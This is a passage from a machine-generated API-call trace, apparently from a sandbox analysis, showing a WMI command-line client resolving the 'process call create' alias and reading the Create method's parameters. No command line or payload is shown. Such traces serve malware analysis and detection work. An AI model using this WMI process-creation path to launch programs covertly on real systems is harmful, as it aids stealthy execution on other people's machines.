This=0x74fff8, wszName="Connection", lFlags=0, pVal=0xcfc3c*(varType=0x0, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8a, varVal1=0x24972c, varVal2=0x87a03c), pType=0x0, plFlavor=0x0 | out: pVal=0xcfc3c*(varType=0xd, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8a, varVal1=0x7503b8, varVal2=0x87a03c), pType=0x0, plFlavor=0x0) returned 0x0 [0172.575] IUnknown:QueryInterface (in: This=0x7503b8, riid=0x876b50*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xcfc74 | out: ppvObject=0xcfc74*=0x7503b8) returned 0x0 [0172.575] GetCurrentThreadId () returned 0xf7c [0172.575] ??0CHString@@QAE@XZ () returned 0xcfbf0 [0172.575] IWbemClassObject:Get (in: This=0x7503b8, wszName="Namespace", lFlags=0, pVal=0xcfbc0*(varType=0x0, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcfbc0*(varType=0x8, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.576] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0172.576] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0172.576] IWbemClassObject:Get (in: This=0x7503b8, wszName="Locale", lFlags=0, pVal=0xcfbc0*(varType=0x0, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x25cf0c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcfbc0*(varType=0x8, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.576] lstrlenW (lpString="ms_409") returned 6 [0172.576] lstrlenW (lpString="ms_409") returned 6 [0172.576] IWbemClassObject:Get (in: This=0x7503b8, wszName="User", lFlags=0, pVal=0xcfbc0*(varType=0x0, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x25cf0c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcfbc0*(varType=0x1, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x25cf0c, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.576] IWbemClassObject:Get (in: This=0x7503b8, wszName="Password", lFlags=0, pVal=0xcfbc0*(varType=0x1, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x25cf0c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcfbc0*(varType=0x1, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x25cf0c, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.576] IWbemClassObject:Get (in: This=0x7503b8, wszName="Server", lFlags=0, pVal=0xcfbc0*(varType=0x1, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x25cf0c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcfbc0*(varType=0x8, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.576] lstrlenW (lpString=".") returned 1 [0172.576] lstrlenW (lpString=".") returned 1 [0172.576] IWbemClassObject:Get (in: This=0x7503b8, wszName="Authority", lFlags=0, pVal=0xcfbc0*(varType=0x0, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x25cf0c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcfbc0*(varType=0x1, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x47, varVal1=0x25cf0c, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.577] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.577] IUnknown:Release (This=0x7503b8) returned 0x1 [0172.577] GetCurrentThreadId () returned 0xf7c [0172.577] ??0CHString@@QAE@XZ () returned 0xcfbe8 [0172.577] IWbemClassObject:Get (in: This=0x74fff8, wszName="__RELPATH", lFlags=0, pVal=0xcfbc8*(varType=0x0, wReserved1=0x6f7d, wReserved2=0x0, wReserved3=0x72, varVal1=0x0, varVal2=0x7503b8), pType=0x0, plFlavor=0x0 | out: pVal=0xcfbc8*(varType=0x8, wReserved1=0x6f7d, wReserved2=0x0, wReserved3=0x72, varVal1="MSFT_CliAlias.FriendlyName=\"Process\"", varVal2=0x7503b8), pType=0x0, plFlavor=0x0) returned 0x0 [0172.577] GetCurrentThreadId () returned 0xf7c [0172.577] ??0CHString@@QAE@XZ () returned 0xcfb78 [0172.577] ??0CHString@@QAE@PBG@Z () returned 0xcfb64 [0172.577] ??0CHString@@QAE@ABV0@@Z () returned 0xcfb04 [0172.577] ?Empty@CHString@@QAEXXZ () returned 0x6f950510 [0172.577] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x472f70 [0172.577] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0172.577] ?Left@CHString@@QBE?AV1@H@Z () returned 0xcfae4 [0172.577] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xcfae8 [0172.577] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xcfb64 [0172.577] ??1CHString@@QAE@XZ () returned 0x1 [0172.577] ??1CHString@@QAE@XZ () returned 0x1 [0172.577] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xcfae0 [0172.577] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xcfb04 [0172.577] ??1CHString@@QAE@XZ () returned 0x1 [0172.577] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x472fd0 [0172.577] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0172.577] ?Left@CHString@@QBE?AV1@H@Z () returned 0xcfae4 [0172.577] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xcfae8 [0172.577] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xcfb64 [0172.578] ??1CHString@@QAE@XZ () returned 0x1 [0172.578] ??1CHString@@QAE@XZ () returned 0x1 [0172.578] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xcfae0 [0172.578] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xcfb04 [0172.578] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.578] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x6f950504 [0172.578] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.578] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0172.578] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0172.578] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0172.578] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Process\\\"") returned 0x26 [0172.578] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Process\\\"") returned 0x79 [0172.578] SysStringLen (param_1="\"") returned 0x1 [0172.579] IWbemServices:GetObject (in: This=0x72c7cc, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Process\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xcfb80*=0x0, ppCallResult=0x0 | out: ppObject=0xcfb80*=0x750440, ppCallResult=0x0) returned 0x0 [0172.582] IWbemClassObject:Get (in: This=0x750440, wszName="Text", lFlags=0, pVal=0xcfb2c*(varType=0x0, wReserved1=0x21, wReserved2=0x44cc, wReserved3=0x21, varVal1=0x48, varVal2=0x8bc1e0), pType=0x0, plFlavor=0x0 | out: pVal=0xcfb2c*(varType=0x2008, wReserved1=0x21, wReserved2=0x44cc, wReserved3=0x21, varVal1=0x236a78*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x2506e0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x8bc1e0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.582] SafeArrayGetLBound (in: psa=0x236a78, nDim=0x1, plLbound=0xcfb44 | out: plLbound=0xcfb44) returned 0x0 [0172.582] SafeArrayGetUBound (in: psa=0x236a78, nDim=0x1, plUbound=0xcfb40 | out: plUbound=0xcfb40) returned 0x0 [0172.582] SafeArrayGetElement (in: psa=0x236a78, rgIndices=0xcfba4, pv=0xcfb6c | out: pv=0xcfb6c) returned 0x0 [0172.582] SysStringLen (param_1="Process management. ") returned 0x14 [0172.583] IUnknown:Release (This=0x750440) returned 0x0 [0172.583] ??1CHString@@QAE@XZ () returned 0x1 [0172.583] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.583] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.583] lstrlenW (lpString="Process management. ") returned 20 [0172.583] lstrlenW (lpString="Process management. ") returned 20 [0172.583] IUnknown:Release (This=0x74fff8) returned 0x0 [0172.583] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.583] lstrlenW (lpString="PATH") returned 4 [0172.583] lstrlenW (lpString="call") returned 4 [0172.583] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="PATH", cchCount2=4) returned 1 [0172.583] lstrlenW (lpString="WHERE") returned 5 [0172.583] lstrlenW (lpString="call") returned 4 [0172.583] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="WHERE", cchCount2=5) returned 1 [0172.583] lstrlenW (lpString="(") returned 1 [0172.583] lstrlenW (lpString="call") returned 4 [0172.583] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="(", cchCount2=1) returned 3 [0172.583] lstrlenW (lpString="/") returned 1 [0172.583] lstrlenW (lpString="call") returned 4 [0172.583] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0172.583] lstrlenW (lpString="-") returned 1 [0172.583] lstrlenW (lpString="call") returned 4 [0172.583] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0172.584] lstrlenW (lpString="GET") returned 3 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0172.584] lstrlenW (lpString="LIST") returned 4 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0172.584] lstrlenW (lpString="SET") returned 3 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0172.584] lstrlenW (lpString="CREATE") returned 6 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0172.584] lstrlenW (lpString="CALL") returned 4 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0172.584] lstrlenW (lpString="/") returned 1 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0172.584] lstrlenW (lpString="-") returned 1 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] lstrlenW (lpString="GET") returned 3 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0172.584] lstrlenW (lpString="LIST") returned 4 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0172.584] lstrlenW (lpString="SET") returned 3 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0172.585] lstrlenW (lpString="CREATE") returned 6 [0172.585] lstrlenW (lpString="call") returned 4 [0172.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0172.585] lstrlenW (lpString="CALL") returned 4 [0172.585] lstrlenW (lpString="call") returned 4 [0172.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0172.585] lstrlenW (lpString="/") returned 1 [0172.585] lstrlenW (lpString="create") returned 6 [0172.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="create", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0172.585] lstrlenW (lpString="-") returned 1 [0172.585] lstrlenW (lpString="create") returned 6 [0172.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="create", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0172.585] lstrlenW (lpString="create") returned 6 [0172.585] lstrlenW (lpString="create") returned 6 [0172.585] GetCurrentThreadId () returned 0xf7c [0172.585] ??0CHString@@QAE@XZ () returned 0xcf41c [0172.585] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0172.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x871f7c, cbMultiByte=-1, lpWideCharStr=0x472fa8, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0172.585] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0172.585] SysStringLen (param_1="process") returned 0x7 [0172.586] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='process") returned 0x23 [0172.586] SysStringLen (param_1="'") returned 0x1 [0172.586] IWbemServices:GetObject (in: This=0x72c74c, strObjectPath="MSFT_CliAlias.FriendlyName='process'", lFlags=0, pCtx=0x0, ppObject=0xcf3f4*=0x0, ppCallResult=0x0 | out: ppObject=0xcf3f4*=0x74fff8, ppCallResult=0x0) returned 0x0 [0172.598] lstrlenW (lpString="CALL") returned 4 [0172.598] lstrlenW (lpString="call") returned 4 [0172.598] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0172.598] IWbemClassObject:Get (in: This=0x74fff8, wszName="Verbs", lFlags=0, pVal=0xcf370*(varType=0x0, wReserved1=0xc, wReserved2=0xc760, wReserved3=0x72, varVal1=0x720150, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf370*(varType=0x200d, wReserved1=0xc, wReserved2=0xc760, wReserved3=0x72, varVal1=0x236a78*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x20b650, rgsabound=((cElements=0x6, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.599] SafeArrayGetLBound (in: psa=0x236a78, nDim=0x1, plLbound=0xcf3bc | out: plLbound=0xcf3bc) returned 0x0 [0172.599] SafeArrayGetUBound (in: psa=0x236a78, nDim=0x1, plUbound=0xcf3a8 | out: plUbound=0xcf3a8) returned 0x0 [0172.599] SafeArrayGetElement (in: psa=0x236a78, rgIndices=0xcf3cc, pv=0xcf408 | out: pv=0xcf408) returned 0x0 [0172.599] IWbemClassObject:Get (in: This=0x752e50, wszName="Name", lFlags=0, pVal=0xcf360*(varType=0x0, wReserved1=0xc, wReserved2=0x190, wReserved3=0x75, varVal1=0x1, varVal2=0x72c758), pType=0x0, plFlavor=0x0 | out: pVal=0xcf360*(varType=0x8, wReserved1=0xc, wReserved2=0x190, wReserved3=0x75, varVal1="Create", varVal2=0x72c758), pType=0x0, plFlavor=0x0) returned 0x0 [0172.599] lstrlenW (lpString="Create") returned 6 [0172.599] lstrlenW (lpString="create") returned 6 [0172.599] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="create", cchCount1=6, lpString2="Create", cchCount2=6) returned 2 [0172.599] GetCurrentThreadId () returned 0xf7c [0172.600] ??0CHString@@QAE@XZ () returned 0xcf250 [0172.600] IWbemClassObject:Get (in: This=0x752e50, wszName="Description", lFlags=0, pVal=0xcf220*(varType=0x0, wReserved1=0x76a9, wReserved2=0x5e03, wReserved3=0x9303, varVal1=0x0, varVal2=0x47f0b0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf220*(varType=0x8, wReserved1=0x76a9, wReserved2=0x5e03, wReserved3=0x9303, varVal1="The Create method creates a new process. It returns an integer value of 0 if the process was successfully created, and any other number to indicate an error.", varVal2=0x47f0b0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.600] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.600] IWbemClassObject:Get (in: This=0x752e50, wszName="Parameters", lFlags=0, pVal=0xcf350*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x72, varVal1=0x720810, varVal2=0x72c760), pType=0x0, plFlavor=0x0 | out: pVal=0xcf350*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x72, varVal1=0x236aa8*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x24ce30, rgsabound=((cElements=0x4, lLbound=0))), varVal2=0x72c760), pType=0x0, plFlavor=0x0) returned 0x0 [0172.600] IWbemClassObject:Get (in: This=0x752e50, wszName="VerbType", lFlags=0, pVal=0xcf328*(varType=0x0, wReserved1=0x100, wReserved2=0x0, wReserved3=0x0, varVal1=0x720000, varVal2=0x8), pType=0x0, plFlavor=0x0 | out: pVal=0xcf328*(varType=0x3, wReserved1=0x100, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x8), pType=0x0, plFlavor=0x0) returned 0x0 [0172.600] IWbemClassObject:Get (in: This=0x752e50, wszName="Derivation", lFlags=0, pVal=0xcf308*(varType=0x0, wReserved1=0x72, wReserved2=0x0, wReserved3=0x72, varVal1=0x720808, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf308*(varType=0x8, wReserved1=0x72, wReserved2=0x0, wReserved3=0x72, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.600] lstrlenW (lpString="Create") returned 6 [0172.600] lstrlenW (lpString="Create") returned 6 [0172.600] SafeArrayGetLBound (in: psa=0x236aa8, nDim=0x1, plLbound=0xcf384 | out: plLbound=0xcf384) returned 0x0 [0172.600] SafeArrayGetUBound (in: psa=0x236aa8, nDim=0x1, plUbound=0xcf3a0 | out: plUbound=0xcf3a0) returned 0x0 [0172.600] SafeArrayGetElement (in: psa=0x236aa8, rgIndices=0xcf3e0, pv=0xcf3f0 | out: pv=0xcf3f0) returned 0x0 [0172.600] IWbemClassObject:Get (in: This=0x75bbf8, wszName="ParaId", lFlags=0, pVal=0xcf318*(varType=0x0, wReserved1=0x301, wReserved2=0x9b08, wReserved3=0x6ec2, varVal1=0x5, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf318*(varType=0x8, wReserved1=0x301, wReserved2=0x9b08, wReserved3=0x6ec2, varVal1="CommandLine", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.601] IWbemClassObject:Get (in: This=0x75bbf8, wszName="Type", lFlags=0, pVal=0xcf2f8*(varType=0x0, wReserved1=0x6ec2, wReserved2=0x4, wReserved3=0x0, varVal1=0x720174, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf2f8*(varType=0x8, wReserved1=0x6ec2, wReserved2=0x4, wReserved3=0x0, varVal1="STRING", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.601] IWbemClassObject:Get (in: This=0x75bbf8, wszName="Default", lFlags=0, pVal=0xcf338*(varType=0x0, wReserved1=0x72, wReserved2=0xf42c, wReserved3=0xc, varVal1=0x77286594, varVal2=0x720138), pType=0x0, plFlavor=0x0 | out: pVal=0xcf338*(varType=0x1, wReserved1=0x72, wReserved2=0xf42c, wReserved3=0xc, varVal1=0x77286594, varVal2=0x720138), pType=0x0, plFlavor=0x0) returned 0x0 [0172.601] GetCurrentThreadId () returned 0xf7c [0172.601] ??0CHString@@QAE@XZ () returned 0xcf258 [0172.601] IWbemClassObject:Get (in: This=0x75bbf8, wszName="Qualifiers", lFlags=0, pVal=0xcf1dc*(varType=0x0, wReserved1=0x87, wReserved2=0x24, wReserved3=0x0, varVal1=0x75b76e, varVal2=0xcf23c), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1dc*(varType=0x200d, wReserved1=0x87, wReserved2=0x24, wReserved3=0x0, varVal1=0x236ad8*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x2506e0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xcf23c), pType=0x0, plFlavor=0x0) returned 0x0 [0172.601] SafeArrayGetLBound (in: psa=0x236ad8, nDim=0x1, plLbound=0xcf218 | out: plLbound=0xcf218) returned 0x0 [0172.601] SafeArrayGetUBound (in: psa=0x236ad8, nDim=0x1, plUbound=0xcf204 | out: plUbound=0xcf204) returned 0x0 [0172.601] SafeArrayGetElement (in: psa=0x236ad8, rgIndices=0xcf240, pv=0xcf250 | out: pv=0xcf250) returned 0x0 [0172.601] IWbemClassObject:Get (in: This=0x75d520, wszName="Name", lFlags=0, pVal=0xcf1ec*(varType=0x0, wReserved1=0x47, wReserved2=0xf224, wReserved3=0xc, varVal1=0x877e52, varVal2=0x1), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1ec*(varType=0x8, wReserved1=0x47, wReserved2=0xf224, wReserved3=0xc, varVal1="In", varVal2=0x1), pType=0x0, plFlavor=0x0) returned 0x0 [0172.602] IWbemClassObject:Get (in: This=0x75d520, wszName="QualifierValue", lFlags=0, pVal=0xcf1cc*(varType=0x0, wReserved1=0x47, wReserved2=0x0, wReserved3=0x0, varVal1=0x75b76e, varVal2=0xcf1f0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1cc*(varType=0x2008, wReserved1=0x47, wReserved2=0x0, wReserved3=0x0, varVal1=0x236b08*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x250810, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xcf1f0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.602] SafeArrayGetLBound (in: psa=0x236b08, nDim=0x1, plLbound=0xcf220 | out: plLbound=0xcf220) returned 0x0 [0172.602] SafeArrayGetUBound (in: psa=0x236b08, nDim=0x1, plUbound=0xcf210 | out: plUbound=0xcf210) returned 0x0 [0172.602] lstrlenW (lpString="CIMTYPE") returned 7 [0172.602] lstrlenW (lpString="In") returned 2 [0172.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="CIMTYPE", cchCount2=7) returned 3 [0172.602] lstrlenW (lpString="read") returned 4 [0172.602] lstrlenW (lpString="In") returned 2 [0172.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0172.602] lstrlenW (lpString="write") returned 5 [0172.602] lstrlenW (lpString="In") returned 2 [0172.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="write", cchCount2=5) returned 1 [0172.602] lstrlenW (lpString="In") returned 2 [0172.602] lstrlenW (lpString="In") returned 2 [0172.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 [0172.602] SafeArrayGetElement (in: psa=0x236b08, rgIndices=0xcf244, pv=0xcf278 | out: pv=0xcf278) returned 0x0 [0172.602] lstrlenW (lpString="true") returned 4 [0172.602] lstrlenW (lpString="True") returned 4 [0172.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0172.603] IUnknown:Release (This=0x75d520) returned 0x1 [0172.603] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.604] IUnknown:Release (This=0x75bbf8) returned 0x1 [0172.604] SafeArrayGetElement (in: psa=0x236aa8, rgIndices=0xcf3e0, pv=0xcf3f0 | out: pv=0xcf3f0) returned 0x0 [0172.604] IWbemClassObject:Get (in: This=0x75c4f0, wszName="ParaId", lFlags=0, pVal=0xcf318*(varType=0x0, wReserved1=0x301, wReserved2=0x9b08, wReserved3=0x6ec2, varVal1=0x25d22c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf318*(varType=0x8, wReserved1=0x301, wReserved2=0x9b08, wReserved3=0x6ec2, varVal1="CurrentDirectory", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.604] IWbemClassObject:Get (in: This=0x75c4f0, wszName="Type", lFlags=0, pVal=0xcf2f8*(varType=0x0, wReserved1=0x6ec2, wReserved2=0x4, wReserved3=0x0, varVal1=0x24821c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf2f8*(varType=0x8, wReserved1=0x6ec2, wReserved2=0x4, wReserved3=0x0, varVal1="STRING", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.604] IWbemClassObject:Get (in: This=0x75c4f0, wszName="Default", lFlags=0, pVal=0xcf338*(varType=0x0, wReserved1=0x72, wReserved2=0xf42c, wReserved3=0xc, varVal1=0x77286594, varVal2=0x720138), pType=0x0, plFlavor=0x0 | out: pVal=0xcf338*(varType=0x1, wReserved1=0x72, wReserved2=0xf42c, wReserved3=0xc, varVal1=0x77286594, varVal2=0x720138), pType=0x0, plFlavor=0x0) returned 0x0 [0172.605] GetCurrentThreadId () returned 0xf7c [0172.605] ??0CHString@@QAE@XZ () returned 0xcf258 [0172.605] IWbemClassObject:Get (in: This=0x75c4f0, wszName="Qualifiers", lFlags=0, pVal=0xcf1dc*(varType=0x0, wReserved1=0x87, wReserved2=0x24, wReserved3=0x0, varVal1=0x75be0e, varVal2=0xcf23c), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1dc*(varType=0x200d, wReserved1=0x87, wReserved2=0x24, wReserved3=0x0, varVal1=0x236ad8*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x2506e0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xcf23c), pType=0x0, plFlavor=0x0) returned 0x0 [0172.605] SafeArrayGetLBound (in: psa=0x236ad8, nDim=0x1, plLbound=0xcf218 | out: plLbound=0xcf218) returned 0x0 [0172.605] SafeArrayGetUBound (in: psa=0x236ad8, nDim=0x1, plUbound=0xcf204 | out: plUbound=0xcf204) returned 0x0 [0172.605] SafeArrayGetElement (in: psa=0x236ad8, rgIndices=0xcf240, pv=0xcf250 | out: pv=0xcf250) returned 0x0 [0172.605] IWbemClassObject:Get (in: This=0x75d520, wszName="Name", lFlags=0, pVal=0xcf1ec*(varType=0x0, wReserved1=0x47, wReserved2=0xf224, wReserved3=0xc, varVal1=0x877e52, varVal2=0x1), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1ec*(varType=0x8, wReserved1=0x47, wReserved2=0xf224, wReserved3=0xc, varVal1="In", varVal2=0x1), pType=0x0, plFlavor=0x0) returned 0x0 [0172.605] IWbemClassObject:Get (in: This=0x75d520, wszName="QualifierValue", lFlags=0, pVal=0xcf1cc*(varType=0x0, wReserved1=0x47, wReserved2=0x0, wReserved3=0x0, varVal1=0x75be0e, varVal2=0xcf1f0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1cc*(varType=0x2008, wReserved1=0x47, wReserved2=0x0, wReserved3=0x0, varVal1=0x236b08*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x250810, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xcf1f0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.605] SafeArrayGetLBound (in: psa=0x236b08, nDim=0x1, plLbound=0xcf220 | out: plLbound=0xcf220) returned 0x0 [0172.605] SafeArrayGetUBound (in: psa=0x236b08, nDim=0x1, plUbound=0xcf210 | out: plUbound=0xcf210) returned 0x0 [0172.605] lstrlenW (lpString="CIMTYPE") returned 7 [0172.605] lstrlenW (lpString="In") returned 2 [0172.605] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="CIMTYPE", cchCount2=7) returned 3 [0172.605] lstrlenW (lpString="read") returned 4 [0172.605] lstrlenW (lpString="In") returned 2 [0172.606] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0172.606] lstrlenW (lpString="write") returned 5 [0172.606] lstrlenW (lpString="In") returned 2 